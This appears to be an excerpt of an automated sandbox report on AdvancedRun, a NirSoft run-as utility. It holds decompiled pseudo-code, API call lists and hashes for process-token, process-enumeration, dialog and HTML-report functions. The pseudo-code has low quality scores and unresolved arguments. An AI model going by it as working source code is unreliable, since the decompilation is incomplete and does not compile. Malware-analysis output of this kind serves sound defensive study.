                                                                  0x00401d14
                                                                  0x00401ce2
                                                                  0x00401ce8
                                                                  0x00401cf3
                                                                  0x00401cfe
                                                                  0x00401d09
                                                                  0x00401d09
                                                                  0x00401cfe
                                                                  0x00401d1b

                                                                  APIs
                                                                  • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                  • memset.MSVCRT ref: 00401C4F
                                                                  • memset.MSVCRT ref: 00401C68
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • _snwprintf.MSVCRT ref: 00401C8F
                                                                  • memset.MSVCRT ref: 00401C9B
                                                                  • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                  • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                  • GetExitCodeProcess.KERNEL32 ref: 00401CF6
                                                                  • GetLastError.KERNEL32 ref: 00401D0E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                  • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                  • API String ID: 903100921-3385179869
                                                                  • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                  • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                  • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                  • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 44%
                                                                  			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}



























                                                                  0x00409ab0
                                                                  0x00409ab7
                                                                  0x00409ac8
                                                                  0x00409acf
                                                                  0x00409ad4
                                                                  0x00409ae0
                                                                  0x00409ae6
                                                                  0x00409ae8
                                                                  0x00409af0
                                                                  0x00409c3a
                                                                  0x00409c41
                                                                  0x00409c67
                                                                  0x00000000
                                                                  0x00409c67
                                                                  0x00409c49
                                                                  0x00409c50
                                                                  0x00409c51
                                                                  0x00409c56
                                                                  0x00409c57
                                                                  0x00409c5a
                                                                  0x00000000
                                                                  0x00409c64
                                                                  0x00409b00
                                                                  0x00409b03
                                                                  0x00409b06
                                                                  0x00409b0b
                                                                  0x00409b10
                                                                  0x00409ba9
                                                                  0x00409bac
                                                                  0x00409bc1
                                                                  0x00409bc7
                                                                  0x00409bcc
                                                                  0x00409bd8
                                                                  0x00409bf0
                                                                  0x00409bf2
                                                                  0x00409c23
                                                                  0x00409c26
                                                                  0x00409c2f
                                                                  0x00409c34
                                                                  0x00409c34
                                                                  0x00000000
                                                                  0x00409c2f
                                                                  0x00409bf7
                                                                  0x00409bfb
                                                                  0x00409c02
                                                                  0x00409c06
                                                                  0x00409c0d
                                                                  0x00409c14
                                                                  0x00409c17
                                                                  0x00409c18
                                                                  0x00409c1b
                                                                  0x00409c1e
                                                                  0x00000000
                                                                  0x00409c1e
                                                                  0x00409b1f
                                                                  0x00409b25
                                                                  0x00409b2a
                                                                  0x00409b2d
                                                                  0x00409b33
                                                                  0x00409b3d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00409b4b
                                                                  0x00409b53
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00409b6a
                                                                  0x00409b6c
                                                                  0x00409b6e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00409b77
                                                                  0x00409b7b
                                                                  0x00409b82
                                                                  0x00409b86
                                                                  0x00409b8d
                                                                  0x00409b8e
                                                                  0x00409b94
                                                                  0x00000000

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00409AB7
                                                                  • memset.MSVCRT ref: 00409ACF
                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                  • _snwprintf.MSVCRT ref: 00409C5A
                                                                    • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                  • memset.MSVCRT ref: 00409B25
                                                                  • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                  • memset.MSVCRT ref: 00409BC7
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                  • String ID: %s\%s$GetTokenInformation$Y@
                                                                  • API String ID: 3504373036-27875219
                                                                  • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                  • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                  • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                  • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}






                                                                  0x00409179
                                                                  0x00409209
                                                                  0x00409209
                                                                  0x00409185
                                                                  0x0040918a
                                                                  0x0040918f
                                                                  0x00409208
                                                                  0x00000000
                                                                  0x00409191
                                                                  0x0040919e
                                                                  0x004091a2
                                                                  0x004091a7
                                                                  0x004091af
                                                                  0x004091b3
                                                                  0x004091b8
                                                                  0x004091c0
                                                                  0x004091c4
                                                                  0x004091c9
                                                                  0x004091d1
                                                                  0x004091d5
                                                                  0x004091da
                                                                  0x004091e2
                                                                  0x004091e6
                                                                  0x004091eb
                                                                  0x004091ed
                                                                  0x004091ed
                                                                  0x004091eb
                                                                  0x004091da
                                                                  0x004091c9
                                                                  0x004091b8
                                                                  0x004091ff
                                                                  0x00409202
                                                                  0x00409202
                                                                  0x00000000
                                                                  0x004091ff

                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                  • API String ID: 1182944575-70141382
                                                                  • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                  • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                  • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                  • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                  0x004090f5
                                                                  0x00409171
                                                                  0x00409171
                                                                  0x004090fd
                                                                  0x00409103
                                                                  0x00409107
                                                                  0x00409170
                                                                  0x00000000
                                                                  0x00409170
                                                                  0x00409116
                                                                  0x0040911a
                                                                  0x0040911f
                                                                  0x00409127
                                                                  0x0040912b
                                                                  0x00409130
                                                                  0x00409138
                                                                  0x0040913c
                                                                  0x00409141
                                                                  0x00409149
                                                                  0x0040914d
                                                                  0x00409152
                                                                  0x0040915a
                                                                  0x0040915e
                                                                  0x00409163
                                                                  0x00409165
                                                                  0x00409165
                                                                  0x00409163
                                                                  0x00409152
                                                                  0x00409141
                                                                  0x00409130
                                                                  0x00000000

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                  • API String ID: 667068680-3953557276
                                                                  • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                  • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                  • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                  • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 56%
                                                                  			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}












                                                                  0x00409faf
                                                                  0x00409fb4
                                                                  0x00409fb5
                                                                  0x00409fb6
                                                                  0x0040a043
                                                                  0x0040a04a
                                                                  0x0040a058
                                                                  0x0040a05f
                                                                  0x0040a06d
                                                                  0x0040a074
                                                                  0x0040a08e
                                                                  0x0040a099
                                                                  0x0040a0ab
                                                                  0x0040a0c9
                                                                  0x0040a0ce
                                                                  0x00000000
                                                                  0x0040a0ce
                                                                  0x00409fc3
                                                                  0x00409fca
                                                                  0x00409fd8
                                                                  0x00409fdf
                                                                  0x00409ff9
                                                                  0x0040a006
                                                                  0x0040a018
                                                                  0x00000000

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf
                                                                  • String ID: %%0.%df
                                                                  • API String ID: 3473751417-763548558
                                                                  • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                  • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                  • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                  • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 51%
                                                                  			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}













                                                                  0x00406216
                                                                  0x0040621b
                                                                  0x00406222
                                                                  0x0040625f
                                                                  0x00406263
                                                                  0x00406269
                                                                  0x00406271
                                                                  0x00406273
                                                                  0x00406289
                                                                  0x00406289
                                                                  0x0040628e
                                                                  0x0040628f
                                                                  0x004062a9
                                                                  0x004062ab
                                                                  0x004062ad
                                                                  0x004062b0
                                                                  0x004062c3
                                                                  0x004062c3
                                                                  0x004062d3
                                                                  0x004062da
                                                                  0x004062f1
                                                                  0x004062f7
                                                                  0x004062fe
                                                                  0x0040630d
                                                                  0x00406312
                                                                  0x0040631e
                                                                  0x00406327
                                                                  0x00406275
                                                                  0x00406283
                                                                  0x00406283
                                                                  0x00406285
                                                                  0x00406287
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406277
                                                                  0x0040627a
                                                                  0x00406280
                                                                  0x00406280
                                                                  0x00000000
                                                                  0x00406280
                                                                  0x00000000
                                                                  0x0040627a
                                                                  0x00000000
                                                                  0x00406283
                                                                  0x00406273
                                                                  0x00406224
                                                                  0x00406224
                                                                  0x00406229
                                                                  0x0040622a
                                                                  0x0040622f
                                                                  0x00406236
                                                                  0x0040623c
                                                                  0x00406243
                                                                  0x00406245
                                                                  0x00406247
                                                                  0x00406248
                                                                  0x0040624b
                                                                  0x00406254
                                                                  0x00406254
                                                                  0x0040632d
                                                                  0x00406334

                                                                  APIs
                                                                  • LoadMenuW.USER32 ref: 00406236
                                                                    • Part of subcall function 0040605E: GetMenuItemCount.USER32(?), ref: 00406074
                                                                    • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                    • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                    • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                  • DestroyMenu.USER32(00000000), ref: 00406254
                                                                  • CreateDialogParamW.USER32 ref: 004062A9
                                                                  • GetDesktopWindow.USER32 ref: 004062B4
                                                                  • CreateDialogParamW.USER32 ref: 004062C1
                                                                  • memset.MSVCRT ref: 004062DA
                                                                  • GetWindowTextW.USER32 ref: 004062F1
                                                                  • EnumChildWindows.USER32 ref: 0040631E
                                                                  • DestroyWindow.USER32(00000005), ref: 00406327
                                                                    • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                  • String ID: caption
                                                                  • API String ID: 973020956-4135340389
                                                                  • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                  • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                  • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                  • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 65%
                                                                  			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

















                                                                  0x004081e4
                                                                  0x004081ec
                                                                  0x004081fc
                                                                  0x00408200
                                                                  0x00408215
                                                                  0x0040821c
                                                                  0x0040822a
                                                                  0x00408231
                                                                  0x0040823f
                                                                  0x00408246
                                                                  0x0040824b
                                                                  0x0040824e
                                                                  0x0040825a
                                                                  0x0040825c
                                                                  0x00408261
                                                                  0x0040826c
                                                                  0x0040826d
                                                                  0x0040826e
                                                                  0x00408273
                                                                  0x00408273
                                                                  0x00408276
                                                                  0x0040827c
                                                                  0x0040828a
                                                                  0x00408290
                                                                  0x004082ab
                                                                  0x004082c5
                                                                  0x004082c6
                                                                  0x004082d1
                                                                  0x004082d2
                                                                  0x004082d3
                                                                  0x004082e7
                                                                  0x004082ec
                                                                  0x004082f0
                                                                  0x00000000
                                                                  0x004082f5
                                                                  0x004082fe

                                                                  APIs
                                                                  Strings
                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                  • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
